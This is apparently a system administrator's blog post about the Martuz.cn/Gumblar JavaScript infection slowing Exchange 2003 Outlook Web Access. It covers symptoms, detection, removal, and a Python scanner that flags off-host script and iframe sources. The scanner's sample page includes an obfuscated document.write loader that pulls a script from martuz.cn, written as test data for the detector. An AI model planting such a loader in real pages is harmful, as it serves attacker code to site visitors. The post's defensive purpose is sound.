Martuz.cn / Gumblar exploit causing Microsoft Exchange 2003 OWA to run extremely slowly after login, and how to fix this problem.
Martuz.cn / Gumblar exploit: root cause of the OWA problem
Symptoms of Microsoft Exchange 2003 Outlook Web Access and martuz.cn JavaScript virus infection
Within the last few days, Outlook Web Access on one of our main Exchange 2003 servers became painfully slow. The main browser window in Internet Explorer would display only the vertical bar that separates the folder list from the message area, stay stuck there for about 30 seconds, and then finally load the rest of the page. Double-clicking to open a message would pop open a blank message window showing http://your servername…. in the lower left status bar, and only after about 30 seconds would the window load. The same thing happened when composing a new mail message in OWA. Everything worked normally except that every task became slower for OWA users.
Martuz.cn JavaScript virus infection detection
We are running the latest version of Symantec Norton Endpoint Security, which did not report any viruses, Trojans or spyware on the Exchange 2003 server. Looking further into the situation, we noticed that when the Outlook Web Access browser window opened, the browser's status bar would display http://yourservername…. and then change to http://martuz.cn/vid/… for a few seconds before the OWA window finally opened. This indicated an infection. Our analysis showed that OWA was serving an infected JavaScript file within the OWA pages, and that script caused the delay. Apparently Symantec Endpoint Security had no clue about this infection, and we are still unsure how the server got infected. Searching the web, we have seen reports of a PHP exploit or an FTP exploit being the cause of this infection.
Martuz.cn JavaScript virus infection removal
First, check whether you have the same problem described here: log in to the OWA account and watch the message at the bottom left of the browser's status bar after login. It should say “Waiting for http://yourservername/exchange”; if at any point it changes to waiting for http://martuz.cn… and then disappears, you have the same problem.
Download the Microsoft Forefront Client Security trial version and install it on the server; we left Symantec Endpoint Security running at the same time without any problem. For a quick check, scan only the entire Exchange installation folder on your server. If you see a message about the Gumblar Trojan, your server is infected. Infected files will be in \Exchsrvr\exchweb\controls and/or D:\Exchsrvr\exchweb\6.5.7651.60 or something similar. Back up the entire exchweb folder just in case, then choose the option to remove the infected files. Re-install the Exchange 2003 Service Pack, which will re-populate the files removed by the anti-virus software.
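As an added check to go with the scan above (example code written for this post, not part of the original or of any Microsoft or Symantec tool), the script below walks an exchweb-style folder and reports every script or iframe src, or document.write, that loads from a host other than your own OWA host name. The sample page, the host name mail.example.com and the martuz.cn file path are constructed.

```python
import os
import re
from urllib.parse import urlparse

# A <script src=...> or <iframe src=...> loading from another host, or a
# document.write(...) that emits one: the usual way an injected snippet pulls
# its second stage from a site such as martuz.cn.
SRC_RE = re.compile(r"""<(?:script|iframe)\b[^>]*?\bsrc\s*=\s*["']?(https?://[^"'\s>]+)""", re.I)
DOCWRITE_RE = re.compile(r"""document\.write\s*\(.*?(https?://[^"'\\\s<>)]+)""", re.I)
WEB_EXTENSIONS = (".htm", ".html", ".js", ".asp", ".aspx")


def find_external_refs(text, allowed_hosts):
    """Return [(line_no, host, url)] for refs whose host is not in allowed_hosts."""
    allowed = {h.lower() for h in allowed_hosts}
    hits = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for pattern in (SRC_RE, DOCWRITE_RE):
            for match in pattern.finditer(line):
                url = match.group(1)
                host = (urlparse(url).hostname or "").lower()
                if host and host not in allowed:
                    hits.append((line_no, host, url))
    return hits


def scan_tree(root, allowed_hosts):
    """Walk an exchweb-style folder; map each web file path to its external refs."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(WEB_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="latin-1", errors="replace") as fh:
                refs = find_external_refs(fh.read(), allowed_hosts)
            if refs:
                findings[path] = refs
    return findings


# Constructed sample: a legitimate-looking OWA control page with one injected line.
# The martuz.cn path is a placeholder; the real path is elided in the post.
SAMPLE_PAGE = """<html><head>
<script src="/exchweb/6.5.7651.60/controls/util_View.js"></script>
<script src="http://mail.example.com/exchweb/controls/owa.js"></script>
</head><body>
<script>document.write(unescape('%3Cscript src="http://martuz.cn/x.js"%3E%3C/script%3E'))</script>
</body></html>"""
```

Running find_external_refs(SAMPLE_PAGE, ["mail.example.com"]) reports only line 5, the injected martuz.cn loader; scan_tree(r"D:\Exchsrvr\exchweb", ["yourservername"]) does the same over the whole folder so you can compare against the Forefront results.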
Summary:
Martuz.cn / Gumblar is a JavaScript exploit that inserts itself into the legitimate OWA files. There is no definitely known cause of how this virus gets installed on the server. Microsoft Forefront Client Security seems to do a good job of detecting and removing the virus. You need to re-install the service pack in order to restore the files removed during the virus removal.